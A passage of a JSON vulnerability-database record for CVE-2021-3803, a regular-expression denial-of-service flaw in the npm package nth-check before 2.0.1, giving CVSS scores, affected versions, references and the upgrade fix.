            "description": [
              {
                "lang": "eng",
                "value": "CWE-1333 Inefficient Regular Expression Complexity"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0",
            "refsource": "CONFIRM",
            "url": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
          },
          {
            "name": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726",
            "refsource": "MISC",
            "url": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726"
          },
          {
            "name": "[debian-lts-announce] 20230522 [SECURITY] [DLA 3428-1] node-nth-check security update",
            "refsource": "MLIST",
            "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html"
          }
        ]
      },
      "source": {
        "advisory": "8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0",
        "discovery": "EXTERNAL"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c2.0.1",
          "affected_versions": "All versions before 2.0.1",
          "cvss_v2": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-1333",
            "CWE-937"
          ],
          "date": "2023-07-10",
          "description": "nth-check is vulnerable to Inefficient Regular Expression Complexity",
          "fixed_versions": [
            "2.0.1"
          ],
          "identifier": "CVE-2021-3803",
          "identifiers": [
            "CVE-2021-3803"
          ],
          "not_impacted": "All versions starting from 2.0.1",
          "package_slug": "npm/nth-check",
          "pubdate": "2021-09-17",
          "solution": "Upgrade to version 2.0.1 or above.",
          "title": "Incorrect Comparison",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2021-3803",
            "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
          ],
          "uuid": "3284fc8f-f377-4fcf-95dd-270a8b922329"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:nth-check_project:nth-check:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.0.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security@huntr.dev",
          "ID": "CVE-2021-3803"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "nth-check is vulnerable to Inefficient Regular Expression Complexity"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-1333"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726"
            },
            {
              "name": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Issue Tracking",
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
            },
            {
              "name": "[debian-lts-announce] 20230522 [SECURITY] [DLA 3428-1] node-nth-check security update",
              "refsource": "MLIST",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2023-07-10T18:52Z",
      "publishedDate": "2021-09-17T07:15Z"
    }
  }
}